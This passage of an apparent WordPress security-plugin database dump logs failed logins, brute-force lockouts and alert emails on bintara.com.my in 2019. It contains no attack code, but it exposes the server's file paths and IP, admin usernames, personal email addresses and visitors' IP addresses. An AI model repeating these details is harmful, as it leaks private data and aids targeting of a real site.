empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.55.177\";s:11:\"REMOTE_PORT\";s:5:\"31621\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxKCt9YzdT54U4Mrp8ZYQAAAY8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567377930.1927\";s:12:\"REQUEST_TIME\";s:10:\"1567377930\";}}','notice','2019-09-01 22:45:31','2019-09-01 22:45:30',18202520,19500184,'https://bintara.com.my/xmlrpc.php',1,0,'157.230.55.177'),(23511,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"173.236.72.146\";s:11:\"REMOTE_PORT\";s:5:\"45714\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxRWd9YzdT54U4Mrp8dWAAAAZg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567379801.8635\";s:12:\"REQUEST_TIME\";s:10:\"1567379801\";}}','notice','2019-09-01 23:16:43','2019-09-01 23:16:42',17687520,19176792,'https://bintara.com.my/wp-login.php',1,0,'173.236.72.146'),(23512,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"173.236.72.146\";s:11:\"REMOTE_PORT\";s:5:\"46067\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxRXN9YzdT54U4Mrp8dWQAAAYk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567379804.8221\";s:12:\"REQUEST_TIME\";s:10:\"1567379804\";}}','notice','2019-09-01 23:16:46','2019-09-01 23:16:45',18202272,19501840,'https://bintara.com.my/xmlrpc.php',1,0,'173.236.72.146'),(23513,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"37.187.132.107\";s:11:\"REMOTE_PORT\";s:5:\"49362\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxfYt9YzdT54U4Mrp8jPwAAAYw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567383394.9008\";s:12:\"REQUEST_TIME\";s:10:\"1567383394\";}}','notice','2019-09-02 00:16:36','2019-09-02 00:16:35',17688888,19178936,'https://bintara.com.my/wp-login.php',1,0,'37.187.132.107'),(23514,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"37.187.132.107\";s:11:\"REMOTE_PORT\";s:5:\"49603\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxfZd9YzdT54U4Mrp8jQQAAAYI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567383397.5267\";s:12:\"REQUEST_TIME\";s:10:\"1567383397\";}}','notice','2019-09-02 00:16:38','2019-09-02 00:16:37',18206424,19503792,'https://bintara.com.my/xmlrpc.php',1,0,'37.187.132.107'),(23515,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"59.188.30.116\";s:11:\"REMOTE_PORT\";s:5:\"52736\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxj3t9YzdT54U4Mrp8ljwAAAYQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567384542.7757\";s:12:\"REQUEST_TIME\";s:10:\"1567384542\";}}','notice','2019-09-02 00:35:44','2019-09-02 00:35:43',17688864,19179592,'https://bintara.com.my/wp-login.php',1,0,'59.188.30.116'),(26596,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:18:50','2019-09-21 15:18:49',19526904,20722104,'https://bintara.com.my/wordpress/wp-login.php',1,0,'89.22.52.17'),(26597,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY-Y0nlR@6WyRVzpiDrXAAAAAg\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.244.116\";s:11:\"REMOTE_PORT\";s:5:\"51858\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY-Y0nlR@6WyRVzpiDrXAAAAAg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079139.8166\";s:12:\"REQUEST_TIME\";s:10:\"1569079139\";}}','notice','2019-09-21 15:19:01','2019-09-21 15:19:00',19228664,20716744,'https://bintara.com.my/test/wp-login.php',1,0,'132.148.244.116'),(26449,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"150.95.52.111\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:57:30\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:57:30\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:57:30\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:57:30\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:57:31','2019-09-21 14:57:30',19220320,20626352,'https://bintara.com.my/wordpress/wp-login.php',1,0,'150.95.52.111'),(26450,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:57:31','2019-09-21 14:57:30',19429032,20626352,'https://bintara.com.my/wordpress/wp-login.php',1,0,'150.95.52.111'),(26451,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY6mnkXpgmG5P@iB8lEVQAAAJE\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"195.161.114.244\";s:11:\"REMOTE_PORT\";s:5:\"60706\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY6mnkXpgmG5P@iB8lEVQAAAJE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077914.4474\";s:12:\"REQUEST_TIME\";s:10:\"1569077914\";}}','notice','2019-09-21 14:58:36','2019-09-21 14:58:34',19135024,20625120,'https://bintara.com.my/2019/wp-login.php',1,0,'195.161.114.244'),(26452,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:58:34\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:58:34\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:58:34\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:58:34\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:58:36','2019-09-21 